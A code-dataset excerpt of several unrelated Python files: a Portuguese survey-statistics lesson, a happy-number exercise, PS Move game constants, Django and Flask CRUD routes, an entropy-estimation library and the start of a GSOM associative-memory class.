há nome para as variáveis\r\n\r\n\r\nwvs.shape # tamanho do banco\r\nwvs.columns # nome das colunas\r\n\r\n# 76 é brasil e 2 argelia, quantidade de entrevistados no brasil e na argelia\r\nwvs.loc[(wvs[1] == 76) | \r\n (wvs[2] == 12), 1].value_counts()\r\n\r\n# 9 é a variável ser feliz, transformando em NaN (sao variaveis que nao foram respondidas #checar dict de var)\r\nwvs.loc[wvs[10] == -2, 10] =np.nan\r\nwvs.loc[wvs[10] == -5, 10] =np.nan\r\nwvs.loc[wvs[10] == -1, 10] =np.nan\r\n\r\n# quantidade de pessoas que responderam sobre felicidade\r\nwvs[10].value_counts()\r\n\r\n# em porcentagem, arredondamos para 2 casas decimais também\r\nround(((wvs[10].value_counts()/\\\r\nwvs[10].value_counts().sum()) * 100), 2)\r\n\r\n# onde as pessoas sao mais felizes, Brasil(variavel 76) ou EUA (variavel 840)\r\n\r\n#brasil\r\nround(((wvs.loc[wvs[1] == 76, 10].value_counts() /\\\r\nwvs.loc[wvs[1] == 76, 10].value_counts().sum()) * 100), 2)\r\n\r\n#eua\r\nround(((wvs.loc[wvs[1] == 840, 10].value_counts() /\\\r\nwvs.loc[wvs[1] == 840, 10].value_counts().sum()) * 100), 2)\r\n\r\n# comparando as média de felicidade entre BRA e EUA\r\nwvs.loc[wvs[1] == 840, 10].mean()\r\nwvs.loc[wvs[1] == 76, 10].mean()\r\n\r\nhappyBrazil = wvs.loc[wvs[1] == 76, 10]\r\nhappyUS = wvs.loc[wvs[1] == 840, 10]\r\n\r\n# nao precisa colocar a media no scipy, ele já calcula só\r\nt, p1 = stats.ttest_ind(happyBrazil,\r\n happyUS,\r\n nan_policy = 'omit')\r\n\r\nprint(f'A estatística de teste foi {t}. \\n O p-valor foi {p1}.')\r\n\r\n\r\n\r\n# comparando se a importância de política tem relação com a importância que as\r\n# pessoas dão para a família\r\n\r\n#### seperando as variáveis de interesse: família, amigos, tempo livre,\r\n# política, trabalho e religião\r\n\r\n# família\r\nwvs[4].value_counts()\r\n\r\n# transformando categorias de NR em NaN\r\nwvs.loc[wvs[4] == -2, 4] =np.nan\r\nwvs.loc[wvs[4] == -5, 4] =np.nan\r\nwvs.loc[wvs[4] == -1, 4] =np.nan\r\n\r\nwvs[4].value_counts()\r\n\r\n# política\r\nwvs[7].value_counts()\r\n\r\nwvs.loc[wvs[7] == -2, 7] =np.nan\r\nwvs.loc[wvs[7] == -5, 7] =np.nan\r\nwvs.loc[wvs[7] == -1, 7] =np.nan\r\nwvs.loc[wvs[7] == -3, 7] =np.nan\r\n\r\nwvs[4].value_counts()\r\n\r\n# plotando o valor da família e da política\r\n\r\n#1) usando seaborn (família)\r\nsns.set(color_codes = True) # set serve para definir estilo do gráfico\r\nsns.countplot(x = wvs[4])\r\nplt.title('Valor dado à Família')\r\nplt.xlabel('Família')\r\nplt.ylabel('Frequência')\r\nplt.show()\r\n\r\n#2) usando o matplotlib CORRIGIR\r\n#plt.bar(x = wvs[4], height = True)\r\n#plt.title('Valor dado à Família')\r\n#plt.xlabel('Família')\r\n#plt.ylabel('Frequência')\r\n#plt.show()\r\n\r\n#3) usando pandas\r\nwvs[4].value_counts().plot(kind = 'bar')\r\nplt.show()\r\n\r\n# plotando para política\r\n\r\nsns.set(color_codes = True) # set serve para definir estilo do gráfico\r\nsns.countplot(x = wvs[7])\r\nplt.title('Valor dado à Política')\r\nplt.xlabel('Política')\r\nplt.ylabel('Frequência')\r\nplt.show()\r\n\r\n# testar se existe associção entre as duas. \r\n# A forma como uma pessoa pensa sobre política tem relação com a forma\r\n# como essa pessoa pensa sobre família\r\n\r\n# criar uma tabela cruzada\r\ntabela = pd.crosstab(wvs[4], wvs[7])\r\n\r\n# teste qui-quadrado para ver a relação de variáveis categóricas\r\n\r\nfrom scipy import stats\r\n\r\n# fiz um unpack para cada um dos resultados que ele retorna\r\nchi2, p, dof, expec = stats.chi2_contingency(tabela)\r\nprint(f'Chi-square: {chi2}')\r\nprint(f'P-value: {p}')\r\nprint(f'Degrees of Freedom: {dof}')\r\n\r\n###\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"wvs/aula_pyOO_5.py","file_name":"aula_pyOO_5.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"242695882","text":"n=int(input(\"enter the numbers\"))\nsum=0\n\nwhile n>0:\n rem=n%10\n square=rem*rem\n sum+=square\n n=n//10\nif sum == 1:\n print(\"I is a Happy number\")\nelse:\n n=sum\n while sum>1:\n while n>0:\n rem=n%10\n square=rem*rem\n sum+=square\n n=n//10\n print(\"not a happy number\")\n \n \n","sub_path":"other code practice/happy numbers.py","file_name":"happy numbers.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"132240632","text":"import psmove\nimport colorsys\nimport time\nfrom enum import Enum\n\ncolor_range = 255\n\n#Human speeds[slow, mid, fast]\nSLOW_WARNING = [0.1, 0.15, 0.28]\nSLOW_MAX = [0.5, 0.8, 1]\nFAST_WARNING = [0.5, 0.6, 0.8]\nFAST_MAX = [1, 1.4, 1.8]\n\nWERE_SLOW_WARNING = [0.2, 0.3, 0.4]\nWERE_SLOW_MAX = [0.7, 0.9, 1.1]\nWERE_FAST_WARNING = [0.6, 0.7, 0.9]\nWERE_FAST_MAX = [1.1, 1.5, 2.0]\n\nZOMBIE_WARNING = [0.5, 0.6, 0.8]\nZOMBIE_MAX = [0.8, 1, 1.4]\n\ndef hsv2rgb(h, s, v):\n return tuple(int(color * color_range) for color in colorsys.hsv_to_rgb(h, s, v))\n\ndef generate_colors(color_num):\n Hue = [ ((num + 1.0)/color_num, 1, 1) for num in range(color_num) ]\n colors = [ hsv2rgb(*hsv_color) for hsv_color in Hue ]\n return colors\n\n\ndef get_move(serial, move_num):\n time.sleep(0.02)\n move = psmove.PSMove(move_num)\n time.sleep(0.05)\n if move.get_serial() != serial:\n for move_num in range(psmove.count_connected()):\n move = psmove.PSMove(move_num)\n if move.get_serial() == serial:\n return move\n return None\n else:\n return move\n\ndef lerp(a, b, p):\n return a*(1 - p) + b*p\n\ndef change_color(color_array, r, g, b):\n color_array[0] = r\n color_array[1] = g\n color_array[2] = b\n\nclass Games(Enum):\n JoustFFA = 0\n JoustTeams = 1\n JoustRandomTeams = 2\n Traitor = 3\n WereJoust = 4\n Zombies = 5\n Commander = 6\n Swapper = 7\n Tournament = 8\n Ninja = 9\n Random = 10\n\nminimum_players = {\n Games.JoustFFA.value: 2,\n Games.JoustTeams.value: 3,\n Games.JoustRandomTeams.value: 3,\n Games.Traitor.value: 6,\n Games.WereJoust.value: 3,\n Games.Zombies.value: 4,\n Games.Commander.value: 4,\n Games.Swapper.value: 3,\n Games.Tournament.value: 3,\n Games.Ninja.value: 2,\n Games.Random.value: 2\n}\n\ngame_mode_names = {\n Games.JoustFFA.value: 'Joust Free-for-All',\n Games.JoustTeams.value: 'Joust Teams',\n Games.JoustRandomTeams.value: 'Joust Random Teams',\n Games.Traitor.value: 'Traitors',\n Games.WereJoust.value: 'Werewolves',\n Games.Zombies.value: 'Zombies',\n Games.Commander.value: 'Commander',\n Games.Swapper.value: 'Swapper',\n Games.Tournament.value: 'Tournament',\n Games.Ninja.value: 'Ninja Bomb',\n Games.Random.value: 'Random'\n}\n\nclass Buttons(Enum):\n middle = 524288\n start = 2048\n select = 256\n circle = 32\n nothing = 0\n\nbattery_levels = {\n 0: \"Low\",\n 1: \"20%\",\n 2: \"40%\",\n 3: \"60%\",\n 4: \"80%\",\n 5: \"100%\",\n 238: \"Charging\",\n 239: \"Charged\"\n}","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"20095606","text":"from django.conf.urls import patterns, url\n\nfrom clients import views\n\nurlpatterns = patterns('',\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^new$', views.ClientCreate.as_view(), name='new'),\n url(r'^(?P<pk>\\d+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^update/(?P<pk>\\d+)/$', views.ClientUpdate.as_view(), name='update'),\n)","sub_path":"clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"157300469","text":"# -*- coding: utf-8 -*-\n# Author: Simone Marsili <simomarsili@gmail.com>\n# License: BSD 3 clause\n\"\"\"\nFunctions for entropy and information measures estimation.\n\"\"\"\nimport logging\n\nimport numpy\n\nfrom ndd.estimators import Entropy, JSDivergence\nfrom ndd.exceptions import (CardinalityError, CombinationError, DataArrayError,\n EstimatorInputError, PmfError)\n\n__all__ = [\n 'entropy',\n 'from_data',\n 'jensen_shannon_divergence',\n 'kullback_leibler_divergence',\n 'interaction_information',\n 'coinformation',\n 'mutual_information',\n 'conditional_entropy',\n 'histogram',\n]\n\nlogger = logging.getLogger(__name__)\n\n\ndef entropy(pk, k=None, alpha=None, plugin=False, return_std=False):\n \"\"\"\n Entropy estimate from an array of counts.\n\n Return a Bayesian estimate for the entropy of an unknown discrete\n distribution from an input array of counts pk.\n\n Parameters\n ----------\n pk : array-like\n The number of occurrences of a set of bins.\n k : int or array-like, optional\n Total number of bins (including unobserved bins); k >= len(pk).\n A float is a valid input for whole numbers (e.g. k=1.e3).\n If an array, set k = numpy.prod(k). Defaults to len(pk).\n alpha : float, optional\n If not None: Wolpert-Wolf entropy estimator (fixed alpha).\n Use a single Dirichlet prior with concentration parameter alpha.\n alpha > 0.0.\n plugin : boolean, optional\n If True, return a 'plugin' estimate of the entropy. The discrete\n distribution is estimated from the empirical frequencies over bins\n and inserted into the entropy definition (plugin estimator).\n If alpha is passed in combination with plugin=True, add\n alpha pseudocounts to each frequency count (pseudocount estimator).\n return_std : boolean, optional\n If True, also return an approximation for the standard deviation\n over the entropy posterior.\n\n Returns\n -------\n entropy : float\n Entropy estimate.\n std : float, optional\n Uncertainty in the entropy estimate. Only if `return_std` is True.\n\n \"\"\"\n\n # pk is an array of counts\n estimator = Entropy(alpha, plugin).fit(pk, k)\n S, err = estimator.estimate_, estimator.err_\n\n if numpy.isnan(S):\n logger.warning('nan value for entropy estimate')\n S = numpy.nan\n\n if return_std:\n if err is not None and numpy.isnan(err):\n err = numpy.nan\n logger.warning('nan value for entropy posterior std deviation')\n return S, err\n\n return S\n\n\ndef from_data(ar, ks=None, axis=1, r=None):\n \"\"\"\n Entropy estimate from data matrix.\n\n Paramaters\n ----------\n ar : array-like, shape (p, n)\n 2D array of n samples from p discrete variables.\n ks : int or 1D array of length p, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis. Defaults to 1.\n r : int, optional; ; 1<=r<=p.\n If passed, return a generator yielding estimates for the p-choose-r\n possible combinations of r variables.\n\n Returns\n -------\n float\n Entropy estimate\n\n \"\"\"\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n # EntropyBasedEstimator objects are callable and return the fitted estimate\n estimator = Entropy()\n\n ks = _check_ks(ks, ar)\n\n if r is not None:\n if ks.ndim == 0:\n raise CardinalityError('For combinations, ks cant be a scalar')\n r = _check_r(r, ar)\n\n counts_combinations = histogram(ar, r=r)\n alphabet_size_combinations = (numpy.prod(x)\n for x in combinations(ks, r=r))\n return (\n estimator(*args)\n for args in zip(counts_combinations, alphabet_size_combinations))\n\n counts = histogram(ar)\n return estimator(counts, k=ks)\n\n\ndef jensen_shannon_divergence(pk, k=None, alpha=None, plugin=False):\n \"\"\"\n Return the Jensen-Shannon divergence from a m-by-p matrix of counts.\n\n Return an estimate of the Jensen-Shannon divergence between\n m unknown discrete distributions from a m-by-p input array of counts.\n The estimate (in nats) is computed as a combination of single Bayesian\n entropy estimates. If the total number of samples varies among the\n distributions, the function returns a weighted divergence with weights\n proportional to the total number of samples in each row\n (see the general definition of Jensen-Shannon divergence:\n https://en.wikipedia.org/wiki/Jensen-Shannon_divergence).\n\n Parameters\n ----------\n\n pk : array-like, shape (m, p)\n Matrix of frequency counts. Each row corresponds to the number of\n occurrences of a set of bins from a different distribution.\n k : int or array-like, optional\n Total number of bins (including unobserved bins); k >= p.\n A float is a valid input for whole numbers (e.g. k=1.e3).\n If an array, set k = numpy.prod(k). Defaults to p.\n alpha : float, optional\n If not None: Wolpert-Wolf entropy estimator (fixed alpha).\n Use a single Dirichlet prior with concentration parameter alpha.\n alpha > 0.0.\n plugin : boolean, optional\n If True, use a 'plugin' estimator for the entropy.\n If alpha is passed in combination with plugin == True, add alpha\n pseudoconts to the frequency counts in the plugin estimate.\n\n Returns\n -------\n float\n Jensen-Shannon divergence.\n\n \"\"\"\n\n estimator = JSDivergence(alpha, plugin).fit(pk, k)\n js = estimator.estimate_\n\n if numpy.isnan(js):\n logger.warning('nan value for JS divergence')\n js = numpy.nan\n\n return js\n\n\ndef kullback_leibler_divergence(pk, qk, k=None, alpha=None, plugin=False):\n \"\"\"\n Kullback-Leibler divergence given counts pk and a reference PMF qk.\n\n Return an estimate of the Kullback-Leibler given an array of counts pk and\n a reference PMF qk. The estimate (in nats) is computed as:\n - S_p - sum(pk * log(qk)) / sum(pk)\n where S_p is the entropy estimate from counts pk.\n\n Parameters\n ----------\n pk : array_like\n The number of occurrences of a set of bins.\n qk : array_like\n Reference PMF in sum(pk log(pk/qk). len(qk) = len(pk).\n Must be a valid PMF (non-negative, normalized).\n k : int or array-like, optional\n Total number of bins (including unobserved bins); k >= p.\n A float is a valid input for whole numbers (e.g. k=1.e3).\n If an array, set k = numpy.prod(k). Defaults to len(pk).\n alpha : float, optional\n If not None: Wolpert-Wolf entropy estimator (fixed alpha).\n Use a single Dirichlet prior with concentration parameter alpha.\n alpha > 0.0.\n plugin : boolean, optional\n If True, use a 'plugin' estimator for the entropy.\n If alpha is passed in combination with plugin == True, add alpha\n pseudoconts to the frequency counts in the plugin estimate.\n\n Returns\n -------\n float\n Kullback-Leibler divergence.\n\n \"\"\"\n\n if is_pmf(qk):\n log_qk = numpy.log(qk)\n else:\n raise PmfError('qk must be a valid PMF')\n\n if len(log_qk) != len(pk):\n raise PmfError('qk and pk must have the same length.')\n\n if k == 1: # single bin\n kl = 0.0\n else:\n estimator = Entropy(alpha, plugin).fit(pk, k)\n kl = -estimator.estimate_ - numpy.sum(pk * log_qk) / float(sum(pk))\n if numpy.isnan(kl):\n logger.warning('nan value for KL divergence')\n kl = numpy.nan\n\n return kl\n\n\ndef interaction_information(ar, ks=None, axis=1, r=None):\n \"\"\"Interaction information from data matrix.\n\n See Eq.10 in:\n Timme, Nicholas, et al.\n \"Synergy, redundancy, and multivariate information measures:\n an experimentalist's perspective.\"\n Journal of computational neuroscience 36.2 (2014): 119-140.\n\n Paramaters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n ks : 1D array of length p, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis\n r : int, optional; 1<=r<=p.\n If passed, return a generator yielding estimates for the p-choose-r\n possible combinations of r variables.\n Combinations are ordered as: list(itertools.combinations(range(p), r)).\n\n Returns\n -------\n float\n Interaction information estimate.\n\n Raises\n ------\n CardinalityError\n If len(ks) != p.\n\n \"\"\"\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n ks = _check_ks(ks, ar)\n if ks.ndim == 0:\n raise CardinalityError('ks cant be a scalar')\n\n if r is not None:\n r = _check_r(r, ar)\n\n data_combinations = combinations(ar, r=r)\n alphabet_size_combinations = (x for x in combinations(ks, r=r))\n return (iinfo(*args)\n for args in zip(data_combinations, alphabet_size_combinations))\n\n return iinfo(ar, ks)\n\n\ndef coinformation(ar, ks=None, r=None):\n \"\"\"Coinformation from data matrix.\n\n See Eq.11 in:\n Timme, Nicholas, et al.\n \"Synergy, redundancy, and multivariate information measures:\n an experimentalist's perspective.\"\n Journal of computational neuroscience 36.2 (2014): 119-140.\n\n The coinformation reduces to the entropy for a single variable and to the\n mutual information for a pair of variables.\n\n Paramaters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n ks : 1D array of length p, optional\n Alphabet size for each variable.\n r : int or None, optional; 1<=r<=p.\n If passed, return a generator yielding estimates for the p-choose-r\n possible combinations of r variables.\n If r == 1, return the entropy for each variable. If r == 2 return the\n mutual information for each possible pair. If r > 2 return the\n coinformation for each possible subset of length r.\n Combinations are ordered as: list(itertools.combinations(range(p), r)).\n\n Returns\n -------\n float\n Coinformation estimate.\n\n \"\"\"\n\n # change sign for odd number of variables\n return (-1)**ar.shape[0] * interaction_information(ar=ar, ks=ks, r=r)\n\n\ndef mutual_information(ar, ks=None, axis=1):\n \"\"\"Mutual information from p-by-n data matrix.\n\n If p > 2, return an estimate of the mutual information for each possible\n pair of variables, ordered as list(itertools.combinations(range(p), r=2)).\n\n Paramaters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n ks : 1D p-dimensional array, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis\n\n Returns\n -------\n float\n Coinformation estimate.\n\n Raises\n ------\n CardinalityError\n If len(ks) != p.\n\n \"\"\"\n\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n p = ar.shape[0]\n\n ks = _check_ks(ks, ar)\n if ks.ndim == 0:\n raise CardinalityError('ks cant be a scalar')\n\n if p > 2:\n h1 = list(from_data(ar, ks=ks, r=1))\n return (h1[i1] + h1[i2] - from_data(ar[[i1, i2]], ks=ks[[i1, i2]])\n for i1, i2 in combinations(range(p), 2))\n\n return numpy.sum(from_data(ar, ks=ks, r=1)) - from_data(ar, ks=ks)\n\n\ndef conditional_entropy(ar, c, ks=None, axis=1, r=None):\n \"\"\"\n Coditional entropy estimate from data matrix.\n\n Paramaters\n ----------\n ar : array-like\n p-by-n array of n samples from p discrete variables.\n c : int or array-like\n The variables on which entropy is conditioned (as column indices).\n ks : 1D p-dimensional array, optional\n Alphabet size for each variable.\n axis : int, optional\n The sample-indexing axis\n r : int or None, optional; 1<=r<=p-len(c).\n If passed, return a generator yielding estimates for all possible\n combinations of r variables conditioning on the `c` variables.\n Indices are sorted as:\n list(x for x in collections.combinations(range(p), r=r+len(c))\n if set(c) <= set(x))\n\n Returns\n -------\n float\n Conditional entropy estimate\n\n \"\"\"\n from itertools import combinations\n\n # check data shape\n ar = _check_data(ar, axis)\n\n p = ar.shape[0]\n\n try:\n c = list(c)\n except TypeError:\n c = [c]\n if not set(c) <= set(range(p)):\n return EstimatorInputError('The indices of conditioning variables'\n ' are not valid')\n\n ks = _check_ks(ks, ar)\n\n # EntropyBasedEstimator objects are callable and return the fitted estimate\n estimator = Entropy()\n\n # Entropy of features on which we are conditioning\n counts = histogram(ar[c])\n hc = estimator(counts, k=ks)\n\n if r is not None:\n if ks.ndim == 0:\n raise CardinalityError('For combinations, ks cant be a scalar')\n\n r = _check_r(r, p - len(c))\n\n # include the c variables in the set\n r = r + len(c)\n\n indices = combinations(range(p), r=r)\n counts_combinations = histogram(ar, r=r)\n alphabet_size_combinations = (numpy.prod(x)\n for x in combinations(ks, r=r))\n return (estimator(*args) - hc for ids, *args in zip(\n indices, counts_combinations, alphabet_size_combinations)\n if set(c) <= set(ids))\n\n counts = histogram(ar)\n return estimator(counts, k=ks) - hc\n\n\ndef _nbins(data):\n \"\"\"\n The number of unique elements along axis 0. If data is p-dimensional,\n the num. of unique elements for each variable.\n \"\"\"\n # reshape as a p-by-n array\n return [len(numpy.unique(v)) for v in data]\n\n\ndef histogram(data, axis=1, r=None):\n \"\"\"Compute an histogram from a data matrix. Wrapper to numpy.unique.\n\n Parameters\n ----------\n data : array-like, shape (p, n)\n A p-by-n array of n samples from p variables.\n axis : int, optional\n The sample-indexing axis. Defaults to 1.\n r : int, optional\n For r values in the interval [1, p],\n return a generator yielding bin counts for each of the p-choose-r\n combinations of r variables.\n\n Returns\n -------\n counts : ndarray\n Bin counts.\n\n \"\"\"\n from itertools import combinations\n\n # check data shape\n data = _check_data(data, axis)\n\n if r is not None:\n r = _check_r(r, data)\n return (histogram(d) for d in combinations(data, r=r))\n\n # statistics for the p-dimensional variable\n _, counts = numpy.unique(data, return_counts=True, axis=1)\n return counts\n\n\ndef _check_data(ar, axis):\n \"\"\"Check that input arrays are non-empty 2D arrays.\"\"\"\n\n ar = numpy.atleast_2d(ar)\n if ar.ndim > 2:\n raise DataArrayError('Input array has %s dimensions; must be 2D' %\n ar.ndim)\n p, n = ar.shape\n if n == 0 or p == 0:\n raise DataArrayError('Empty input array')\n\n if axis == 0:\n ar = ar.T\n\n return ar\n\n\ndef _check_r(r, ar):\n \"\"\"\n Raises\n ------\n CombinationError\n For r values out of the interval [1, p].\n \"\"\"\n if ar.shape:\n p = ar.shape[0]\n else:\n p = ar\n if r < 1 or r > p:\n raise CombinationError('r values must be in the interval [1, %s]' % p)\n return r\n\n\ndef _check_ks(ks, ar):\n \"\"\"\n Raises\n ------\n CardinalityError\n If ks is array-like and len(ks) != p.\n \"\"\"\n\n if ks is None:\n # guess from data\n ks = numpy.array([len(numpy.unique(v)) for v in ar])\n else:\n try:\n ks = numpy.float64(ks)\n except ValueError:\n raise CardinalityError('%s: not a valid cardinality')\n if ks.ndim:\n p = ar.shape[0]\n if len(ks) != p:\n raise CardinalityError('k should have len %s' % p)\n return ks\n\n\ndef iinfo(X, ks):\n \"\"\"Helper function for interaction information definition.\n\n Ref: timme2014synergy\n \"\"\"\n info = 0.0\n S = len(X)\n for T in range(1, S + 1):\n sgn = (-1)**(S - T)\n info += sgn * numpy.sum(from_data(X, ks=ks, r=T))\n return -info\n\n\ndef coinfo(X, ks):\n \"\"\"Helper function for coinformation definition.\n\n Ref: timme2014synergy\n \"\"\"\n info = 0.0\n S = len(X)\n for T in range(1, S + 1):\n sgn = (-1)**T\n info += sgn * numpy.sum(from_data(X, ks=ks, r=T))\n return -info\n\n\ndef is_pmf(a):\n \"\"\"If a is a valid probability mass function.\"\"\"\n a = numpy.float64(a)\n not_negative = numpy.all(a >= 0)\n normalized = numpy.isclose(sum(a), 1.0)\n return not_negative and normalized\n","sub_path":"ndd/nsb.py","file_name":"nsb.py","file_ext":"py","file_size_in_byte":16856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"508311417","text":"from flask import Flask, render_template, request, redirect\n\nfrom LecturebotDAL.repository import Repository, UnitOfWork, ServiceLocator\nfrom LecturebotDAL.models import Role, User, Lecture, UserHasResources, Resource, Component, Attribute\nfrom LecturebotDAL.dbcontext import *\n\nfrom LecturebotAPI.forms import RoleForm, LectureForm, ResourceForm, RoleEditForm, LectureEditForm, ResourceEditForm\n\napp = Flask(__name__)\napp.secret_key = 'development key'\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('navigation.html')\n\n\n@app.route('/role', methods=['GET', 'POST'])\ndef list_roles():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n roles = repository.get_all(Role.Role)\n form = RoleForm.RoleForm(request.form)\n\n if request.method == 'POST':\n new_role = Role.Role(name=form.Name.data, priority=form.Priority.data)\n repository.create(new_role)\n unit_of_work.commit()\n return redirect('/role')\n\n return render_template('role.html', roles=roles, form=form)\n\n\n@app.route('/role/delete/<identity>', methods=['GET'])\ndef delete_role(identity):\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n repository.drop(Role.Role, identity, True)\n unit_of_work.commit()\n return redirect('/role')\n\n\n@app.route('/role/edit/<identity>', methods=['GET'])\ndef edit_role(identity):\n form = RoleEditForm.RoleEditForm()\n form.id.data = identity\n return render_template('roleedit.html', identity=identity, form=form)\n\n\n@app.route('/roleedit', methods=['POST'])\ndef save_changes_role():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n form = RoleEditForm.RoleEditForm(request.form)\n\n new_role = Role.Role(name=form.Name.data, priority=form.Priority.data)\n new_role.Id = form.id.data\n\n repository.update(Role.Role, new_role, form.id.data, True)\n unit_of_work.commit()\n return redirect('/role')\n\n\n@app.route('/user', methods=['GET'])\ndef list_users():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n users = repository.get_all(User.User)\n\n return render_template('user.html', users=users)\n\n\n@app.route('/lecture', methods=['GET', 'POST'])\ndef list_lectures():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n lectures = repository.get_all(Lecture.Lecture)\n form = LectureForm.LectureForm(request.form)\n\n if request.method == 'POST':\n new_lecture = Lecture.Lecture(header=form.Header.data, content=form.Content.data, userlogin=form.Owner.data)\n repository.create(new_lecture)\n unit_of_work.commit()\n return redirect('/lecture')\n\n return render_template('lecture.html', lectures=lectures, form=form)\n\n\n@app.route('/lecture/delete/<identity>', methods=['GET'])\ndef delete_lecture(identity):\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n repository.drop(Lecture.Lecture, identity, True)\n unit_of_work.commit()\n return redirect('/lecture')\n\n\n@app.route('/lecture/edit/<identity>', methods=['GET'])\ndef edit_lecture(identity):\n form = LectureEditForm.LectureEditForm()\n form.id.data = identity\n return render_template('lectureedit.html', identity=identity, form=form)\n\n\n@app.route('/lectureedit', methods=['POST'])\ndef save_changes_lecture():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n form = LectureEditForm.LectureEditForm(request.form)\n\n new_lecture = Lecture.Lecture(header=form.Header.data, content=form.Content.data, userlogin=form.Owner.data)\n new_lecture.Id = form.id.data\n\n repository.update(Lecture.Lecture, new_lecture, form.id.data, True)\n unit_of_work.commit()\n return redirect('/lecture')\n\n\n@app.route('/userhasresources', methods=['GET'])\ndef list_resources_of_user():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n resources_of_user = repository.get_all(UserHasResources.UserHasResources)\n\n return render_template('userhasresource.html', usersresources=resources_of_user)\n\n\n@app.route('/resource', methods=['GET', 'POST'])\ndef list_resources():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n resources = repository.get_all(Resource.Resource)\n form = ResourceForm.ResourceForm(request.form)\n\n if request.method == 'POST':\n new_resource = Resource.Resource(url=form.URL.data, description=form.Description.data)\n repository.create(new_resource)\n unit_of_work.commit()\n return redirect('/resource')\n\n return render_template('resource.html', resources=resources, form=form)\n\n\n@app.route('/resource/delete/(<url>)', methods=['GET'])\ndef delete_resource(url):\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n repository.drop(Resource.Resource, url, False)\n unit_of_work.commit()\n return redirect('/lecture')\n\n\n@app.route('/resource/edit/(<url>)', methods=['GET'])\ndef edit_resource(url):\n form = LectureEditForm.LectureEditForm()\n form.id.data = url\n return render_template('lectureedit.html', identity=url, form=form)\n\n\n@app.route('/resourceedit', methods=['POST'])\ndef save_changes_resource():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n unit_of_work = UnitOfWork.UnitOfWork(session, ModelBase)\n form = ResourceEditForm.ResourceEditForm(request.form)\n\n new_resource = Resource.Resource(url=form.id.data, description=form.Description.data)\n\n repository.update(Resource.Resource, new_resource, form.id.data, False)\n unit_of_work.commit()\n return redirect('/resource')\n\n\n@app.route('/component', methods=['GET'])\ndef list_components():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n components = repository.get_all(Component.Component)\n\n return render_template('component.html', components=components)\n\n\n@app.route('/attribute', methods=['GET'])\ndef list_attributes():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n attributes = repository.get_all(Attribute.Attribute)\n\n return render_template('attribute.html', attributes=attributes)\n\n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n repository = Repository.Repository(session, ModelBase, DBEngine)\n resources = repository.get_all(Resource.Resource)\n\n repository = ServiceLocator.ServiceLocator(session, ModelBase, DBEngine)\n res_count = repository.get_count_of_resources_of_user().fetchall()\n\n urls = [str(resource.URL) for resource in resources]\n times = [int(resource.TimesVisited) for resource in resources]\n\n res = [str(resC[0]) for resC in res_count]\n count = [int(resC[1]) for resC in res_count]\n\n return render_template('dashboard.html', x1=urls, y1=times, x2=res, y2=count)\n","sub_path":"Laboratory2/src/LecturebotAPI/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"138807976","text":"\nimport numpy as np\nfrom .gsom import GSOM\nfrom .hebbian import Hebbian, FakeHebbian\nfrom .math_functions import distance, gaussian_field\n\nclass AssociativeMemory:\n\n def __init__(self, map_size=(10, 10), map_expanding=True, use_hebbian=True):\n self._map1 = GSOM(size=map_size, expanding=map_expanding)\n self._map2 = GSOM(size=map_size, expanding=map_expanding)\n\n self._hebbian = FakeHebbian()\n if use_hebbian:\n self._hebbian = Hebbian(\n size1=self._map1.size,\n size2=self._map2.size\n )\n\n @property\n def size1(self):\n return self._map1.size\n\n @property\n def size2(self):\n return self._map2.size\n\n @property\n def learning_rate(self):\n return 0.5 * (self._map1.learning_rate + self._map2.learning_rate)\n\n 